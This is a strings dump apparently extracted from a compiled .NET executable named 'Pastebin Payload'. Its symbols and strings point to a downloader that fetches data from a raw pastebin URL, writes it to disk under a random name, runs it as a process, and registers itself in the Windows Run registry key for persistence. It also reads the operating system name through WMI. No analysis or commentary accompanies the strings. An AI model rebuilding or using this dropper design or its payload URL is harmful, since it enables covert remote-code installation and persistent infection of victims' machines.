!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<>c__DisplayClass1_0
<>9__3_0
<fnGetFriendlyName>b__3_0
<>9__5_0
<RandomString>b__5_0
<Main>b__0
IEnumerable`1
List`1
Microsoft.Win32
Func`2
<Module>
System.IO
DownloadData
mscorlib
System.Collections.Generic
Thread
Pastebin Payload
Pastebin_Payload
IEnumerable
IDisposable
Console
fnGetFriendlyName
ReadLine
WriteLine
OfType
System.Core
Dispose
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
SetValue
GetPropertyValue
Pastebin Payload.exe
System.Threading
System.Runtime.Versioning
DownloadString
RandomString
ToString
GetFolderPath
get_Length
length
Program
System
Random
random
pastebin
System.Reflection
ManagementObjectCollection
Exception
RegisterInStartup
System.Linq
StringReader
TextReader
SpecialFolder
ManagementObjectSearcher
CurrentUser
GetEnumerator
.cctor
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
WriteAllBytes
System.Collections
get_Chars
Process
Concat
Repeat
ManagementBaseObject
ManagementObject
Select
System.Net
FirstOrDefault
WebClient
System.Management
Environment
get_Current
ThreadStart
MoveNext
ToArray
OpenSubKey
RegistryKey
Registry
WrapNonExceptionThrows
Pastebin Payload
Copyright
2021
$3e9acb44-42d5-4713-8f24-a723c5d96acb
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
C:\Users\Test\source\repos\Pastebin Payload\Pastebin Payload\obj\Release\Pastebin Payload.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SELECT Caption FROM Win32_OperatingSystem
Unknown
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
https://pastebin.com/raw/gCyjHCCH
Caption
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Pastebin Payload
FileVersion
1.0.0.0
InternalName
Pastebin Payload.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
Pastebin Payload.exe
ProductName
Pastebin Payload
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0